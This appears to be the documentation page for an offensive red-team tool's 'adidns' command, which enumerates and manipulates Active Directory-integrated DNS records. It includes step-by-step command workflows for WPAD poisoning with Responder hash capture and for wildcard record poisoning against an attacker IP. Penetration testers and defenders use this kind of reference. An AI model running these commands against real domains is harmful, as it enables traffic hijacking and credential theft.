Skip to main content

adidns

Active Directory Integrated DNS (ADIDNS) enumeration and manipulation. ADIDNS stores DNS records directly as objects in Active Directory. By default, any authenticated domain user can add new records, making this a common vector for name poisoning attacks.

Usage

r4t adidns <subcommand> [flags]

Subcommands

adidns enum

Enumerate all ADIDNS records from Active Directory. 
r4t adidns enum
Reads DNS node objects from the DomainDnsZones and/or ForestDnsZones application partitions in AD and displays all records. Results are stored in the dns_records table.

adidns add

Add a new DNS record to ADIDNS. 
# Add an A record pointing to attacker IP
r4t adidns add --record wpad --data 10.10.10.100

# Add a wildcard A record
r4t adidns add --record "*" --data 10.10.10.100

# Add a CNAME record
r4t adidns add --record malicious --type CNAME --data legitimate.corp.example.com

# Add to the forest DNS zone
r4t adidns add --record wpad --data 10.10.10.100 --forest

# Custom TTL
r4t adidns add --record wpad --data 10.10.10.100 --ttl 300

# Add an SRV record
r4t adidns add --record _custom._tcp --type SRV --data target.corp.example.com \
  --priority 10 --weight 100 --port 8080
FlagShortTypeDescription
--record-rstringTarget record name (FQDN or relative name) [required]
--type-tstringRecord type: A, AAAA, CNAME, SRV (default: A)
--data-DstringRecord data (IP address, target hostname, etc.) [required]
--zonestringDNS zone (defaults to domain)
--forestboolUse ForestDnsZones instead of DomainDnsZones
--legacyboolUse the System partition (legacy DNS storage)
--allow-multipleboolAllow multiple records with the same name
--ttlintTTL in seconds (default: 180)
--dns-serverstringDNS server IP for SOA serial lookup
--tcpboolUse DNS over TCP for SOA lookup
--rpcboolUse RPC instead of LDAP (not yet implemented)
--priorityuint16SRV record priority
--weightuint16SRV record weight
--portuint16SRV record port

adidns modify

Modify an existing ADIDNS record. 
# Update an A record to a new IP
r4t adidns modify --record wpad --data 10.10.10.200

# Update in forest zone
r4t adidns modify --record wpad --data 10.10.10.200 --forest
Shares the same flags as adidns add except --allow-multiple is not available.

adidns remove

Remove (tombstone) an ADIDNS record. 
# Remove a record
r4t adidns remove --record wpad

# Remove from a specific zone
r4t adidns remove --record wpad --zone corp.example.com
Tombstoning marks the record for deletion. The record is not immediately removed — AD replication handles cleanup.
FlagShortTypeDescription
--record-rstringRecord name to remove [required]
--zonestringDNS zone
--forestboolUse ForestDnsZones
--legacyboolUse System partition
--dns-serverstringDNS server for SOA lookup
--tcpboolDNS over TCP

adidns resurrect

Resurrect a tombstoned ADIDNS record. 
r4t adidns resurrect --record wpad
Re-activates a previously tombstoned record. Uses the same flags as adidns remove.

adidns query

Query a specific ADIDNS record. 
# Query an A record
r4t adidns query --record wpad

# Query with type filter
r4t adidns query --record _ldap._tcp --type SRV
FlagShortTypeDescription
--record-rstringRecord name to query [required]
--type-tstringRecord type filter
--zonestringDNS zone
--forestboolUse ForestDnsZones
--legacyboolUse System partition
--dns-serverstringDNS server for SOA lookup
--tcpboolDNS over TCP

Common ADIDNS Attack Workflows

WPAD Poisoning

WPAD (Web Proxy Auto-Discovery) abuse via ADIDNS: 
# 1. Check if wpad record exists
r4t adidns query --record wpad

# 2. Add a WPAD record pointing to attacker machine
r4t adidns add --record wpad --data 10.10.10.100

# 3. Start Responder on the attacker machine to capture hashes
# sudo responder -I eth0 -wP

# 4. Clean up after capture
r4t adidns remove --record wpad

Wildcard Record Poisoning

# Add wildcard — all unresolved names return attacker IP
r4t adidns add --record "*" --data 10.10.10.100 --allow-multiple

# Remove when done
r4t adidns remove --record "*"

DNS Record Storage

Enumerated records are stored in the dns_records table in SQLite.